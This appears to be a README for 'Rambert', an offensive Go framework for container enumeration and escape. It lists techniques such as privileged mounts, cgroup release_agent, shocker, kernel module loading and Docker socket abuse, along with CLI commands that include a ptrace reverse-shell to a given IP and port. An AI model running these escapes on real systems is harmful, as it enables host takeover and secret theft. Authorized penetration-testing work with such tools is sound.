Share
## https://sploitus.com/exploit?id=4486B82C-43DF-537A-B02D-189F4B1D03A9
# Rambert
__________ ___. __
\______ \_____ _____\_ |__ ____________/ |_
| _/\__ \ / \| __ \_/ __ \_ __ \ __\
| | \ / __ \| Y Y \ \_\ \ ___/| | \/| |
|____|_ /(____ /__|_| /___ /\___ >__| |__|
\/ \/ \/ \/ \/
"But, you know, I do not belong here!"
Rambert is a productionβquality framework for container escape, enumeration, and exploitation.
## Overview
`Rambert` is a handsβon offensive security tool that automates the detection, enumeration, and exploitation of container escape vectors. It is designed for educational purposes and authorized penetration testing in lab environments.
The tool performs comprehensive environment reconnaissance, then guides you through the most promising escape techniques β from privileged containers and capability abuses to Docker socket exploitation and runtime CVEs.
## Features
### π Enumeration (6 submodules)
- **Platform** β detect container runtime, user, groups, Docker executable, socket, and version.
- **Container** β full container ID, name, IP, DNS, host IP, OS, kernel, architecture, CPU, tools, dangerous capabilities, SSHD, privileged mode, cgroup version, namespaces and host sharing.
- **Mounts** β Docker socket detection and interesting host bind mounts.
- **Files** β sensitive environment variables, root files, home directories, password hashes, and secrets in common files.
- **Containers** β discover other containers/hosts via subnet scanning and port scanning.
- **Host** β port and service scan on the host gateway.
### π₯ Exploits (3 categories)
- **Privileged**
- `priv_mount_chroot` (mount host root and chroot)
- `priv_nsenter` (enter host namespaces)
- `priv_host_proc` (access host `/proc/1`)
- **Capabilities**
- `cgroup_v1` (release_agent escape in guided mode)
- `ptrace` (reverse shell injection)
- `shocker` (`open_by_handle_at`)
- `sys_module` (load kernel module)
- **Socket** β create a privileged container via the Docker API.
### π§ Chaining
- **Automated guide** β evaluates your environment and prints a stepβbyβstep recommendation of which exploits to try, including the exact command, prerequisites, and reasoning.
## Project Structure
```bash
container-escape-kit/
βββ cmd/cek/ # CLI entry point
β βββ main.go
β βββ enum.go # enumeration subcommands
β βββ exploit.go # exploit parent command
β βββ exploit_privileged.go # privileged exploits
β βββ exploit_capabilities.go # capability exploits
β βββ exploit_socket.go # socket exploit
β βββ chain.go # chaining engine
βββ internal/
β βββ enum/ # enumeration modules
β β βββ platform.go
β β βββ container.go
β β βββ mounts.go
β β βββ files.go
β β βββ containerscan.go
β β βββ hostscan.go
β βββ exploit/ # exploit modules
β β βββ privileged/
β β βββ capabilities/
β β βββ socket/
β βββ chain/ # chaining logic
β βββ types/ # shared types
β βββ utils/ # utilities (capabilities, cgroup, mounts, ptrace, etc.)
βββ PoCs/ # standalone proofβofβconcept files
```
## Key Qualities
- **Safe by default** β all destructive actions require `--dry-run` and explicit confirmation flags.
- **Modular** β each exploit and enumeration module is selfβcontained and extensible.
- **CGOβfree** β pure Go, crossβcompiled static binaries for easy deployment.
- **Use native Linux methods** β interacts with the container in a native Linux manner using `/proc` and `/sys` native file systems.
## Quick Start
### Build
```bash
make build
```
### Enumerate
```bash
# All enumeration modules
./bin/Rambert enum
# Specific submodules
./bin/Rambert enum platform
./bin/Rambert enum container
./bin/Rambert enum mounts
./bin/Rambert enum files
./bin/Rambert enum containers
./bin/Rambert enum host
```
### Exploit
```bash
# List available exploits
./bin/Rambert exploit
# Privileged escapes
./bin/Rambert exploit privileged priv_mount_chroot --dry-run
./bin/Rambert exploit privileged priv_nsenter
./bin/Rambert exploit privileged priv_host_proc
# Capability escapes
./bin/Rambert exploit capabilities ptrace --ip 192.168.1.100 --port 4444
./bin/Rambert exploit capabilities shocker
./bin/Rambert exploit capabilities sys_module --module /path/to/root_module.ko
./bin/Rambert exploit capabilities cgroup_v1
# Docker socket escape
./bin/Rambert exploit socket
```
### Chain (Automated Guide)
```bash
# Generate a stepβbyβstep escape recommendation
./bin/Rambert chain
```
## Licensing & Ethics
Do not use this tool against systems you do not own or have explicit permission to test.
## References
[Container Escapes Workshop](https://some-natalie.dev/container-escapes-workshop/)
[HackTricks β Docker Security](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security)
[YakLang β Container Escape Techniques](https://github.com/yaklang/hack-skills/blob/main/skills/container-escape-techniques/SKILL.md)